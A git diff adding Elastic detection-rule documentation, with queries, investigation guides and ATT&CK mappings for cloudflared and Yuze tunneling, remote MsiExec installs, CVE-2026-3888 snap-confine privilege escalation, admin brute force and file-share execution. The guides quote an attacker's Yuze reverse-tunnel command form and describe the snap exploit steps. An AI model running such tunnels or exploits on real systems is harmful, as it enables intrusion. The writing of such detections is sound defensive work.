+[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "cloudflared.exe" or ?process.pe.original_file_name == "cloudflared.exe" or ?process.code_signature.subject_name : "Cloudflare, Inc.") and process.args : "tunnel" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-protocol-tunneling-via-yuze.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-protocol-tunneling-via-yuze.asciidoc
new file mode 100644
index 0000000000..0cf9a161e0
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-protocol-tunneling-via-yuze.asciidoc
@@ -0,0 +1,120 @@
+[[prebuilt-rule-8-19-18-potential-protocol-tunneling-via-yuze]]
+=== Potential Protocol Tunneling via Yuze
+
+Identifies execution of Yuze, a lightweight open-source tunneling tool used for intranet penetration. Yuze supports forward and reverse SOCKS5 proxy tunneling and is typically executed via rundll32 loading yuze.dll with the RunYuze export. Threat actors may use it to proxy C2 or pivot traffic.
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* endgame-*
+* logs-crowdstrike.fdr*
+* logs-endpoint.events.process-*
+* logs-m365_defender.event-*
+* logs-sentinel_one_cloud_funnel.*
+* logs-system.security*
+* logs-windows.sysmon_operational-*
+* winlogbeat-*
+
+*Severity*: medium
+
+*Risk score*: 47
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*:
+
+* https://attack.mitre.org/techniques/T1572/
+* https://github.com/P001water/yuze
+* https://www.trendmicro.com/tr_tr/research/26/c/dissecting-a-warlock-attack.html
+
+*Tags*:
+
+* Domain: Endpoint
+* OS: Windows
+* Use Case: Threat Detection
+* Tactic: Command and Control
+* Resources: Investigation Guide
+* Data Source: Elastic Defend
+* Data Source: Sysmon
+* Data Source: SentinelOne
+* Data Source: Microsoft Defender for Endpoint
+* Data Source: Crowdstrike
+* Data Source: Elastic Endgame
+* Data Source: Windows Security Event Logs
+
+*Version*: 1
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+
+*Investigating Potential Protocol Tunneling via Yuze*
+
+
+Yuze is a C-based tunneling tool used for intranet penetration and supports forward and reverse SOCKS5 proxy tunneling. It is commonly executed as `rundll32 yuze.dll,RunYuze reverse -c :` and has been observed in threat actor campaigns.
+ + +*Possible investigation steps* + + +- Confirm the command line contains `yuze.dll` and `RunYuze`; typical form is `rundll32 yuze.dll,RunYuze reverse -c :`. +- Extract the remote endpoint from the `-c` argument (C2 or relay) and look up the IP/domain in threat intelligence. +- Locate where yuze.dll was loaded from; check file creation time to see if it was recently dropped. +- Identify the parent process that started rundll32 (script, scheduled task, exploit, etc.) to understand the execution chain. +- Correlate with network events for outbound connections from this host to the IP/port in the command line. + + +*False positive analysis* + + +- Legitimate use of Yuze is rare; most hits are likely malicious or red-team. If you use Yuze for authorized testing, consider an exception by host or user. + + +*Response and remediation* + + +- Isolate the host and terminate the rundll32 process. +- Remove yuze.dll from disk and hunt for other copies or related artifacts. +- Block the C2/relay IP or domain at DNS/firewall; rotate credentials if the tunnel was used for access. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + ( + (process.args : "reverse" and process.args : ("-c", "-s")) or + (process.args : ("proxy", "fwd") and process.args : "-l") + ) and + (?process.code_signature.exists == false or process.name : "rundll32.exe") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ 
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-remote-install-via-msiexec.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-remote-install-via-msiexec.asciidoc
new file mode 100644
index 0000000000..1ae250ddb3
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-remote-install-via-msiexec.asciidoc
@@ -0,0 +1,133 @@
+[[prebuilt-rule-8-19-18-potential-remote-install-via-msiexec]]
+=== Potential Remote Install via MsiExec
+
+Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of malware.
+
+*Rule type*: eql
+
+*Rule indices*:
+
+* endgame-*
+* logs-crowdstrike.fdr*
+* logs-endpoint.events.process-*
+* logs-m365_defender.event-*
+* logs-sentinel_one_cloud_funnel.*
+* logs-system.security*
+* logs-windows.forwarded*
+* logs-windows.sysmon_operational-*
+* winlogbeat-*
+
+*Severity*: high
+
+*Risk score*: 73
+
+*Runs every*: 5m
+
+*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>)
+
+*Maximum alerts per execution*: 100
+
+*References*: None
+
+*Tags*:
+
+* Domain: Endpoint
+* OS: Windows
+* Use Case: Threat Detection
+* Tactic: Defense Evasion
+* Data Source: Elastic Endgame
+* Data Source: Elastic Defend
+* Data Source: Windows Security Event Logs
+* Data Source: Microsoft Defender for Endpoint
+* Data Source: Sysmon
+* Data Source: SentinelOne
+* Data Source: Crowdstrike
+* Resources: Investigation Guide
+
+*Version*: 2
+
+*Rule authors*:
+
+* Elastic
+
+*Rule license*: Elastic License v2
+
+
+==== Investigation guide
+
+
+
+*Triage and analysis*
+
+
+> **Disclaimer**:
+> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
+
+
+*Investigating Potential Remote Install via MsiExec*
+
+
+MsiExec is a Windows utility for installing, maintaining, and removing software. Adversaries exploit it to execute malicious payloads by disguising them as legitimate installations.
The detection rule identifies suspicious child processes spawned by MsiExec that initiate network activity, which is atypical for standard installations. By focusing on unusual executable paths and network connections, the rule helps uncover potential misuse indicative of malware delivery or initial access attempts.
+
+
+*Possible investigation steps*
+
+
+- Review the process tree to identify the parent and child processes of the suspicious MsiExec activity, focusing on the process.entity_id and process.parent.name fields to understand the execution flow.
+- Examine the process.executable path to determine if it deviates from typical installation paths, as specified in the query, to assess the likelihood of malicious activity.
+- Analyze the network or DNS activity associated with the process by reviewing the event.category field for network or dns events, and correlate these with the process.name to identify any unusual or unauthorized connections.
+- Check the process.args for any unusual or suspicious command-line arguments that might indicate an attempt to execute malicious payloads or scripts.
+- Investigate the host's recent activity and security logs to identify any other indicators of compromise or related suspicious behavior, leveraging data sources like Elastic Defend, Sysmon, or SentinelOne as mentioned in the rule's tags.
+- Assess the risk and impact of the detected activity by considering the context of the alert, such as the host's role in the network and any potential data exposure or system compromise.
+
+
+*False positive analysis*
+
+
+- Legitimate software installations or updates may trigger the rule if they involve network activity. Users can create exceptions for known software update processes that are verified as safe.
+- Custom enterprise applications that use MsiExec for deployment and require network access might be flagged. Identify these applications and exclude their specific executable paths from the rule.
+- Automated deployment tools that utilize MsiExec and perform network operations could be misidentified. Review these tools and whitelist their processes to prevent false alerts.
+- Security software or system management tools that leverage MsiExec for legitimate purposes may cause false positives. Confirm these tools' activities and add them to an exclusion list if necessary.
+- Regularly review and update the exclusion list to ensure it reflects the current environment and any new legitimate software that may interact with MsiExec.
+
+
+*Response and remediation*
+
+
+- Isolate the affected system from the network immediately to prevent further malicious activity and lateral movement.
+- Terminate the suspicious child process spawned by MsiExec to halt any ongoing malicious operations.
+- Conduct a thorough scan of the affected system using updated antivirus or endpoint detection and response (EDR) tools to identify and remove any malicious payloads or remnants.
+- Review and analyze the process execution and network activity logs to identify any additional indicators of compromise (IOCs) and assess the scope of the intrusion.
+- Reset credentials and review access permissions for any accounts that may have been compromised or used during the attack.
+- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected.
+- Implement enhanced monitoring and detection rules to identify similar threats in the future, focusing on unusual MsiExec activity and network connections.
+ +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name : "msiexec.exe" and process.args : ("-i*", "/i*", "-p*", "/p*") and process.command_line : "*http*" and + process.args : ("/qn", "-qn", "-q", "/q", "/quiet") and + process.parent.name : ("sihost.exe", "explorer.exe", "cmd.exe", "wscript.exe", "mshta.exe", "powershell.exe", "wmiprvse.exe", "pcalua.exe", "forfiles.exe", "conhost.exe") and + not process.command_line : ("*--set-server=*", "*UPGRADEADD=*" , "*--url=*", + "*USESERVERCONFIG=*", "*RCTENTERPRISESERVER=*", "*app.ninjarmm.com*", "*zoom.us/client*", + "*SUPPORTSERVERSTSURI=*", "*START_URL=*", "*AUTOCONFIG=*", "*awscli.amazonaws.com*") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Msiexec +** ID: T1218.007 +** Reference URL: https://attack.mitre.org/techniques/T1218/007/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-snap-confine-privilege-escalation-via-cve-2026-3888.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-snap-confine-privilege-escalation-via-cve-2026-3888.asciidoc new file mode 100644 index 0000000000..be71191a07 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-potential-snap-confine-privilege-escalation-via-cve-2026-3888.asciidoc 
@@ -0,0 +1,147 @@
+[[prebuilt-rule-8-19-18-potential-snap-confine-privilege-escalation-via-cve-2026-3888]]
+=== Potential snap-confine Privilege Escalation via CVE-2026-3888
+
+This rule detects non-root file creation within "/tmp/.snap" or its host backing path "/tmp/snap-private-tmp/*/tmp/.snap", which may indicate exploitation attempts related to CVE-2026-3888. In vulnerable Ubuntu systems, the snap-confine utility normally creates the "/tmp/.snap" directory as root when initializing a snap sandbox. The vulnerability arises when systemd-tmpfiles deletes this directory after it becomes stale, allowing an unprivileged user to recreate it and populate attacker-controlled files. During subsequent snap sandbox initialization, snap-confine may bind-mount or trust these attacker-controlled paths, enabling manipulation of libraries or configuration files that can lead to local privilege escalation to root. Because legitimate creation of ".snap" directories should only be performed by root, non-root file activity in these locations is highly suspicious. This detection helps identify early stages of the exploit before privilege escalation is completed.
+ +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.qualys.com/vulnerabilities-threat-research/2026/03/17/cve-2026-3888-important-snap-flaw-enables-local-privilege-escalation-to-root +* https://cdn2.qualys.com/advisory/2026/03/17/snap-confine-systemd-tmpfiles.txt + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Use Case: Vulnerability +* Tactic: Privilege Escalation +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential snap-confine Privilege Escalation via CVE-2026-3888* + + +This rule flags non-root creation of files under temporary snap sandbox directories that snap-confine should prepare as root, which can expose an attempt to abuse CVE-2026-3888 for local root access. A common pattern is an unprivileged user waiting for stale `/tmp/.snap` content to be removed, recreating that path, and dropping crafted libraries or configuration so the next snap launch pulls attacker-controlled files into the sandbox setup and elevates privileges. + + +*Possible investigation steps* + + +- Review the originating user's recent terminal, SSH, sudo, and scheduled-task activity to determine whether the file creation was part of legitimate administration or an unexpected local execution chain. 
+- Inspect the affected `.snap` directory contents for crafted symlinks, shared libraries, configuration files, or path redirection artifacts that could be consumed during snap sandbox initialization. +- Correlate the activity with nearby launches of `snap`, `snap-confine`, `snapd`, or installed snap applications and determine whether any such execution was followed by a new root-level process tree. +- Look for evidence that `systemd-tmpfiles` or another cleanup mechanism removed the stale directory shortly before it was recreated by the unprivileged account, as this timing strongly supports CVE-2026-3888 exploitation behavior. +- Examine post-alert host activity for signs of successful escalation such as unexpected root-owned file changes, new setuid binaries, persistence creation, credential access, or security control tampering. + + +*False positive analysis* + + +- A user troubleshooting a failing snap application may manually create or modify files under `/tmp/.snap` or `/tmp/snap-private-tmp/*/tmp/.snap`; verify by reviewing the parent shell/process lineage and nearby `snap` or `snap-confine` executions to confirm it was interactive testing with no follow-on root activity. +- Telemetry can occasionally attribute file creation to the invoking non-root user during normal snap sandbox initialization even though the privileged helper completes the action; verify by checking whether related `snap` or `snap-confine` events occurred at the same time and whether the final directory and files are owned by root. + + +*Response and remediation* + + +- Isolate the affected Linux host from the network, stop any active `snap`, `snap-confine`, or suspicious root shell processes tied to the originating user, and preserve the contents of `/tmp/.snap` or `/tmp/snap-private-tmp/*/tmp/.snap` for evidence. 
+- Remove attacker-controlled files, symlinks, shared libraries, and configuration placed in the recreated `.snap` paths, then delete any persistence added after the event such as unauthorized `systemd` units, `/etc/cron*` entries, `~/.ssh/authorized_keys` changes, sudoers modifications, new local accounts, or unexpected setuid-root binaries. +- Escalate immediately to incident response and treat the host as fully compromised if you confirm a root-owned process tree descending from the unprivileged user, root-level file changes outside the temporary snap path, or tampering with `/etc/ld.so.preload`, PAM modules, or endpoint security agents. +- Restore the host to a known-good state by rebuilding or reimaging it when privilege escalation cannot be conclusively ruled out, or otherwise replace modified system files from trusted packages, rotate credentials exposed on the system, and verify correct root ownership and permissions on snap temporary directories before reconnecting it. +- Harden the environment by applying the vendor fix for CVE-2026-3888, updating `snapd` and related Ubuntu packages, restricting unnecessary local shell access, and increasing monitoring for non-root creation of files under `/tmp/.snap` and `/tmp/snap-private-tmp/*/tmp/.snap`. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". 
+- In the query bar, search for "Elastic Defend" and select the integration to see more details about it.
+- Click "Add Elastic Defend".
+- Configure the integration name and optionally add a description.
+- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads".
+- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide].
+- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions"
+- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead.
+For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide].
+- Click "Save and Continue".
+- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts.
+For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide].
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+file where host.os.type == "linux" and event.action == "creation" and
+file.path like ("/tmp/.snap*", "/tmp/snap-private-tmp/*/tmp/.snap*") and
+user.id != "0"
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Privilege Escalation
+** ID: TA0004
+** Reference URL: https://attack.mitre.org/tactics/TA0004/
+* Technique:
+** Name: Exploitation for Privilege Escalation
+** ID: T1068
+** Reference URL: https://attack.mitre.org/techniques/T1068/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-privileged-accounts-brute-force.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-privileged-accounts-brute-force.asciidoc new file mode 100644 index 0000000000..b08720f696 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-privileged-accounts-brute-force.asciidoc 
@@ -0,0 +1,155 @@ +[[prebuilt-rule-8-19-18-privileged-accounts-brute-force]] +=== Privileged Accounts Brute Force + +Identifies multiple consecutive logon failures targeting more than one Admin account from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Resources: Investigation Guide +* Data Source: Windows Security Event Logs + +*Version*: 118 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Privileged Accounts Brute Force* + + +Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found https://attack.mitre.org/techniques/T1110/001/[here]. + +This rule identifies potential password guessing/brute force activity from a single address against multiple accounts that contains the `admin` pattern on its name, which is likely a highly privileged account. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Investigate the logon failure reason code and the targeted user name. + - Prioritize the investigation if the account is critical or has administrative privileges over the domain. +- Investigate the source IP address of the failed Network Logon attempts. + - Identify whether these attempts are coming from the internet or are internal. +- Investigate other alerts associated with the involved users and source host during the past 48 hours. +- Identify the source and the target computer and their roles in the IT environment. +- Check whether the involved credentials are used in automation or scheduled tasks. +- If this activity is suspicious, contact the account owner and confirm whether they are aware of it. +- Examine the source host for derived artifacts that indicate compromise: + - Observe and collect information about the following activities in the alert source host: + - Attempts to contact external domains and addresses. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity. + + +*False positive analysis* + + +- Authentication misconfiguration or obsolete credentials. +- Service account password expired. +- Domain trust relationship issues. +- Infrastructure or availability issues. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the source host to prevent further post-compromise behavior. +- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.
+- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.
+- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.
+- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+from logs-system.security*, logs-windows.forwarded*, winlogbeat-* metadata _id, _version, _index
+| where event.category == "authentication" and host.os.type == "windows" and event.action == "logon-failed" and
+ winlog.logon.type == "Network" and source.ip is not null and winlog.computer_name is not null and
+ not cidr_match(TO_IP(source.ip), "127.0.0.0/8", "::1") and
+ to_lower(winlog.event_data.TargetUserName) like "*admin*" and
+ /*
+ noisy failure status codes often associated to authentication misconfiguration
+ 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.
+ 0XC000005E - There are currently no logon servers available to service the logon request.
+ 0XC0000133 - Clocks between DC and other computer too far out of sync.
+ 0XC0000192 An attempt was made to logon, but the Netlogon service was not started.
+ 0xc00000dc - DC is in shutdown phase, it will normally tell current clients to use another DC for authentication.
+ */
+ not winlog.event_data.Status in ("0xc000015b", "0xc000005e", "0xc0000133", "0xc0000192", "0xc00000dc")
+// truncate the timestamp to a 60-second window
+| eval Esql.time_window = date_trunc(60 seconds, @timestamp)
+| stats Esql.failed_auth_count = COUNT(*),
+ Esql.target_user_name_values = VALUES(winlog.event_data.TargetUserName),
+ Esql.count_distinct_user_name = count_distinct(winlog.event_data.TargetUserName),
+ Esql.user_domain_values = VALUES(user.domain),
+ Esql.error_codes = VALUES(winlog.event_data.Status),
+ Esql.data_stream_namespace.values = VALUES(data_stream.namespace) by winlog.computer_name, source.ip, Esql.time_window, winlog.logon.type
+| where Esql.failed_auth_count >= 50 and Esql.count_distinct_user_name >= 2
+| eval user.name = mv_first(Esql.target_user_name_values)
+| KEEP winlog.computer_name, source.ip, user.name, Esql.time_window, winlog.logon.type, Esql.*
+
+----------------------------------
+
+*Framework*: MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Credential Access
+** ID: TA0006
+** Reference URL: https://attack.mitre.org/tactics/TA0006/
+* Technique:
+** Name: Brute Force
+** ID: T1110
+** Reference URL: https://attack.mitre.org/techniques/T1110/
+* Sub-technique:
+** Name: Password Guessing
+** ID: T1110.001
+** Reference URL: https://attack.mitre.org/techniques/T1110/001/
+* Sub-technique:
+** Name: Password Spraying
+** ID: T1110.003
+** Reference URL: https://attack.mitre.org/techniques/T1110/003/
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-execution-via-file-shares.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-execution-via-file-shares.asciidoc
new file mode 100644
index 0000000000..b21acf5291
--- /dev/null
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-18/prebuilt-rule-8-19-18-remote-execution-via-file-shares.asciidoc
@@ -0,0 +1,162 @@ +[[prebuilt-rule-8-19-18-remote-execution-via-file-shares]] +=== Remote Execution via File Shares + +Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process-* +* logs-endpoint.events.file-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* http://web.archive.org/web/20230329172636/https://blog.menasec.net/2020/08/new-trick-to-detect-lateral-movement.html +* https://www.elastic.co/security-labs/hunting-for-lateral-movement-using-event-query-language + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 121 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Remote Execution via File Shares* + + +Adversaries can use network shares to host tooling to support the compromise of other hosts in the environment. These tools can include discovery utilities, credential dumpers, malware, etc. + +> **Note**: +> This investigation guide uses the https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. 
+- Review adjacent login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the host for derived artifacts that indicate suspicious activities: + - Analyze the process executable using a private sandboxed analysis system. + - Observe and collect information about the following activities in both the sandbox and the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. 
+ - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification. + + +*False positive analysis* + + +- This activity can happen legitimately. Consider adding exceptions if it is expected and noisy in your environment. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). 
+ - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.
+- Remove and block malicious artifacts identified during triage.
+- Review the privileges needed to write to the network share and restrict write access as needed.
+- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.
+- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.
+- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).
+
+
+==== Rule query
+
+
+[source, js]
+----------------------------------
+sequence with maxspan=1m
+ [file where host.os.type == "windows" and event.type in ("creation", "change") and
+ process.pid == 4 and (file.extension : ("exe", "scr", "pif", "com") or file.Ext.header_bytes : "4d5a*")] by host.id, file.path
+ [process where host.os.type == "windows" and event.type == "start" and
+ not (
+ (
+ process.code_signature.trusted == true and
+ process.code_signature.subject_name : (
+ "Veeam Software Group GmbH",
+ "Elasticsearch, Inc.",
+ "PDQ.com Corporation",
+ "CrowdStrike, Inc.",
+ "Microsoft Windows Hardware Compatibility Publisher",
+ "ZOHO Corporation Private Limited",
+ "BeyondTrust Corporation",
+ "CyberArk Software Ltd.",
+ "Sophos Ltd"
+ )
+ ) or
+ (
+ process.executable : (
+ "?:\\Windows\\ccmsetup\\ccmsetup.exe",
+ "?:\\Windows\\SoftwareDistribution\\Download\\Install\\AM_Delta*.exe",
+ "?:\\Windows\\CAInvokerService.exe"
+ ) and process.code_signature.trusted == true
+ ) or
+ (
+ process.executable : "G:\\SMS_*\\srvboot.exe" and
+ process.code_signature.trusted == true and process.code_signature.subject_name : "Microsoft Corporation"
+ )
+ )
+ ] by host.id, process.executable
+
+----------------------------------
+
+*Framework*:
MITRE ATT&CK^TM^
+
+* Tactic:
+** Name: Lateral Movement
+** ID: TA0008
+** Reference URL: https://attack.mitre.org/tactics/TA0008/
+* Technique:
+** Name: Remote Services
+** ID: T1021
+** Reference URL: https://attack.mitre.org/techniques/T1021/
+* Sub-technique:
+** Name: SMB/Windows Admin Shares
+** ID: T1021.002
+** Reference URL: https://attack.mitre.org/techniques/T1021/002/
